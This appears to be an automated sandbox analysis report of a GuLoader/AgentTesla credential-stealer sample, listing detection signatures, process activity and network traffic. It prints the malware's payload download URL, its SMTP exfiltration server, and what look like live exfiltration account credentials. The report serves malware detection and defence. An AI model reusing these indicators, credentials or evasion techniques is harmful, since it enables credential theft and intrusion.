Loading ...

Play interactive tourEdit tour

Windows Analysis Report ZAM#U00d3WIENIE.exe

Overview

General Information

Sample Name:ZAM#U00d3WIENIE.exe
Analysis ID:1648
MD5:4805bfc9145d8aa3ac43d1cc29c451ed
SHA1:7787fa250b35d1a67142d230cbedbc357eb8cb9c
SHA256:bac5da263610272c5c5be4ecb5a16626c653a757abaffc8402d210227ec04bb8
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • ZAM#U00d3WIENIE.exe (PID: 2104 cmdline: 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe' MD5: 4805BFC9145D8AA3AC43D1CC29C451ED)
    • RegAsm.exe (PID: 1940 cmdline: 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.25720716372.00000000022C0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: RegAsm.exe PID: 1940JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 1940, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49807

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.1940.11.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}
            Antivirus detection for URL or domainShow sources
            Source: http://mail.tccinfaes.comAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: http://mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D799C0 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D799B8 CryptUnprotectData,
            Source: ZAM#U00d3WIENIE.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49796 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 188.93.227.195 188.93.227.195
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biaf70slhogar9caibgbbnhqpn/1634141175000/01707528263340534167/*/1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49807 -> 188.93.227.195:587
            Source: global trafficTCP traffic: 192.168.11.20:49807 -> 188.93.227.195:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 0000000B.00000002.30198324847.000000001DD45000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000003.26630972556.0000000000EC1000.00000004.00000001.sdmpString found in binary or memory: http://Y8B3f1kpIES.net
            Source: RegAsm.exe, 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmpString found in binary or memory: http://Y8B3f1kpIES.nett-
            Source: RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 0000000B.00000002.30203677372.000000001FDD0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: RegAsm.exe, 0000000B.00000002.30203677372.000000001FDD0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 0000000B.00000002.30198135256.000000001DD1F000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
            Source: RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
            Source: RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: RegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://rpZocA.com
            Source: RegAsm.exe, 0000000B.00000002.30198135256.000000001DD1F000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
            Source: RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 0000000B.00000002.30186051316.0000000000E32000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000002.30185888032.0000000000E0F000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.11.drString found in binary or memory: http://x1.i.lencr.org/
            Source: RegAsm.exe, 0000000B.00000002.30198205747.000000001DD29000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 0000000B.00000002.30186637038.0000000000EA8000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/o
            Source: RegAsm.exe, 0000000B.00000002.30186637038.0000000000EA8000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/p
            Source: RegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 0000000B.00000002.30185888032.0000000000E0F000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/
            Source: RegAsm.exe, 0000000B.00000003.25696520194.0000000000E57000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/docs/secure%id
            Source: RegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5bi
            Source: RegAsm.exe, 0000000B.00000002.30185550528.0000000000DC8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 0000000B.00000002.30185550528.0000000000DC8000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000002.30184481839.0000000000CC0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX
            Source: RegAsm.exe, 0000000B.00000003.25691001658.0000000000E54000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX2MatdvVlumnf8ZSlM
            Source: RegAsm.exe, 0000000B.00000002.30198418016.000000001DD53000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.30197114429.000000001DC4E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 0000000B.00000002.30198418016.000000001DD53000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 0000000B.00000002.30198418016.000000001DD53000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 0000000B.00000002.30198418016.000000001DD53000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 0000000B.00000002.30197114429.000000001DC4E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ci1bu5biaf70slhogar9caibgbbnhqpn/1634141175000/01707528263340534167/*/1YskFLBi29LIb1vUTRMsrhrkgjF8NUmBX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49796 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: ZAM#U00d3WIENIE.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_0040167A
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_0040162D
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_0040143E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00741130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00743A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0074BA58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00744320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0074C7B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00743708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D5CCD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D5A058
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D54EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D5760F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D544F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D53330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D7E4F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D710A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D75DF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D7BDE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D7118F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D7A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00D76558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1D9E5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1D9E4ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1D9E5DF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1D9E6AF1
            Source: ZAM#U00d3WIENIE.exe, 00000001.00000000.25144414562.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefamiliegruppers.exe vs ZAM#U00d3WIENIE.exe
            Source: ZAM#U00d3WIENIE.exeBinary or memory string: OriginalFilenamefamiliegruppers.exe vs ZAM#U00d3WIENIE.exe
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: ZAM#U00d3WIENIE.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3DJump to behavior
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeFile created: C:\Users\user\AppData\Local\Temp\~DF174542F925963EBA.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/3@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.25720716372.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00402E52 push esi; ret
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00405E3D pushfd ; retf
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00402ECA push esi; ret
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00402EFC push ss; ret
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00402E84 push ss; ret
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_00403CBF push ebp; retf
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_022C0422 push ecx; ret
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_022C3A3D push ecx; retf
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_022C4C4A push esi; iretd
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_022C050D push ebx; retf
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeCode function: 1_2_022C35FF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\ZAM#U00d3WIENIE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
